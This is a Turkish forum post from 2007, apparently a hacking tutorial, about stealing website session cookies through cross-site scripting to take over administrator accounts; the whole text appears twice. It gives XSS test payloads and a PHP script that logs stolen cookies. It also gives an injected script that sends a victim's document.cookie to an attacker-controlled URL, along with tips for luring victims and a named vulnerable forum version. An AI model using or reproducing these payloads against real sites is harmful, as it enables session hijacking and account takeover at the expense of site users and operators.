17-02-2007, 18:17
Cookie Nedir?
Cookie nedir ilk önce bunu tanımlayalım örneklerle;Cookie bizi sitelerde kimliğimizi belirlemeye yarıyan .txt dosyalarıdır.Örneğin bir siteye üye oluruz ve beni hatırla seçeneği olurya bildiğiniz gibi,beni hatırla diyerek login olduğumuzda site Pc'mize bir cookie atar.Bu Cookie ile bizim yöneticimi,usermi olduğumuzu tanımlar yada başka birşey.Örneğin oylamalardada bu şekildede olabilir.Oylamayı atarsınız bakmışsınız Pc'nizde bir Cookie.Bir daha oylama yapmaya kalktığınızda Pcnizdeki Cookie harekete geçerek engelliyecektir.
Ne işimize yarar
Cookie çalmak ne işimize yarar,biz bir user seviyesindeyken bir yöneticinin cookiesini almaya kalkarsak onun cookiesi üst seviye olacağından bizimkisi ile değişince doğal olarak biz admin olarak girmiş oluruz ve yapıcağımızı yaparız.
Cookieyi nasıl çalarız?
-Açığın olduğu alan tespit edilir; Açığın olduğu alanı bulmak için örneğin forumlarda html/java yiyen bölgelere deneme yapılır çeşitli kodlarla.İmza altına atarak olabilir,çeşitli türlerde olabilir.
En azından şunu deniyebilirsiniz; <script>javascript:alert(document.cookie);</script> Bu kod JavaScript dilinde alert uyarı demek ,cookie parametresi ile birleşince o anki cookieni ekrana yansıtır sadece seninkini tabi.Baktın oluyor daha tehlikelisin denersin.
-Bir script ile Cookienin loglanması sağlanır;Aşağıda Cookieyi çalmak için gerekli scripti yazacağız.
-Açığın olduğu yere bir script enjekte edilir;Cookie bilgisini gönderecek alert gibi
-Kurbanın o sayfaya bir şekilde girmesi sağlanır;Direk link veremieğinize göre(salaksa veririz) bir frame içinde olabilir çeşitli yollarla deniyebilirsiniz.Hele forum gibi alanlarda direk verirsiniz görünmez çünki.
Uygulamaya geçelim..
Kod:
<?php
$filename = getcwd()."\\loglarburada.txt";
if(!file_exists($filename)){
touch($filename);
chmod($filename, 0666);
}
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
}
echo "Log başarıyla girildi...";
fclose($handle);
exit;
}
echo "Hani loglayacağımız parametre?";
exit;
?>
// Thanks Coded Kozan-SisTeam
Yukarıdaki bir Php scriptimizdir Cookieyi loglamaya yarıyacak.Peki ne diyor scripti loglarburada.txt diye yeni bir .txt belgesi oluştur ve buraya cookieyi yaz diyor.
Cookienin yazılabilmesi için ChMod777 yani yazma izninde olması gerekiyor anlamına gelir.
Cookieyi şu parametre ile alacağız;
Kod:
<script>window.navigate("http://xx.com/cookie.php?cookie="+document.cookie)</script>
Nasılmı dediğinizi duyuyorum,biraz örneklere geçelim.
Örneğin bir Ziyaretçi defteri; Bunun Html Kod yiyen İnputlarını gözden geçiririz ;
Kod:
<script>JavaScript:alert(document.cookie);</script>
Kodu ile bir kontrol ederiz bu taglar yasaklanmışmı yasaklanmamışmı diye.
Hatta Phpbb 2.0.16'Da bu şekilde bir açık mevcut; İmza bölümüne gerekli kod girilerek çalınabiliyor.Çok çeşitleri wadır BBCODE ile cookie çalınması vs.. vs..
Geleceğin en tehlikeli açıklarından biridir diyebilirim..
…………………………………………………………………………………………………………………………………………………………………..
Cookie nedir ilk önce bunu tanımlayalım örneklerle;Cookie bizi sitelerde kimliğimizi belirlemeye yarıyan .txt dosyalarıdır.Örneğin bir siteye üye oluruz ve beni hatırla seçeneği olurya bildiğiniz gibi,beni hatırla diyerek login olduğumuzda site Pc'mize bir cookie atar.Bu Cookie ile bizim yöneticimi,usermi olduğumuzu tanımlar yada başka birşey.Örneğin oylamalardada bu şekildede olabilir.Oylamayı atarsınız bakmışsınız Pc'nizde bir Cookie.Bir daha oylama yapmaya kalktığınızda Pcnizdeki Cookie harekete geçerek engelliyecektir.
Ne işimize yarar
Cookie çalmak ne işimize yarar,biz bir user seviyesindeyken bir yöneticinin cookiesini almaya kalkarsak onun cookiesi üst seviye olacağından bizimkisi ile değişince doğal olarak biz admin olarak girmiş oluruz ve yapıcağımızı yaparız.
Cookieyi nasıl çalarız?
-Açığın olduğu alan tespit edilir; Açığın olduğu alanı bulmak için örneğin forumlarda html/java yiyen bölgelere deneme yapılır çeşitli kodlarla.İmza altına atarak olabilir,çeşitli türlerde olabilir.
En azından şunu deniyebilirsiniz; <script>javascript:alert(document.cookie);</script> Bu kod JavaScript dilinde alert uyarı demek ,cookie parametresi ile birleşince o anki cookieni ekrana yansıtır sadece seninkini tabi.Baktın oluyor daha tehlikelisin denersin.
-Bir script ile Cookienin loglanması sağlanır;Aşağıda Cookieyi çalmak için gerekli scripti yazacağız.
-Açığın olduğu yere bir script enjekte edilir;Cookie bilgisini gönderecek alert gibi
-Kurbanın o sayfaya bir şekilde girmesi sağlanır;Direk link veremieğinize göre(salaksa veririz) bir frame içinde olabilir çeşitli yollarla deniyebilirsiniz.Hele forum gibi alanlarda direk verirsiniz görünmez çünki.
Uygulamaya geçelim..
Kod:
<?php
$filename = getcwd()."\\loglarburada.txt";
if(!file_exists($filename)){
touch($filename);
chmod($filename, 0666);
}
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
}
echo "Log başarıyla girildi...";
fclose($handle);
exit;
}
echo "Hani loglayacağımız parametre?";
exit;
?>
// Thanks Coded Kozan-SisTeam
Yukarıdaki bir Php scriptimizdir Cookieyi loglamaya yarıyacak.Peki ne diyor scripti loglarburada.txt diye yeni bir .txt belgesi oluştur ve buraya cookieyi yaz diyor.
Cookienin yazılabilmesi için ChMod777 yani yazma izninde olması gerekiyor anlamına gelir.
Cookieyi şu parametre ile alacağız;
Kod:
<script>window.navigate("http://xx.com/cookie.php?cookie="+document.cookie)</script>
Nasılmı dediğinizi duyuyorum,biraz örneklere geçelim.
Örneğin bir Ziyaretçi defteri; Bunun Html Kod yiyen İnputlarını gözden geçiririz ;
Kod:
<script>JavaScript:alert(document.cookie);</script>
Kodu ile bir kontrol ederiz bu taglar yasaklanmışmı yasaklanmamışmı diye.
Hatta Phpbb 2.0.16'Da bu şekilde bir açık mevcut; İmza bölümüne gerekli kod girilerek çalınabiliyor.Çok çeşitleri wadır BBCODE ile cookie çalınması vs.. vs..
Geleceğin en tehlikeli açıklarından biridir diyebilirim..
…………………………………………………………………………………………………………………………………………………………………..
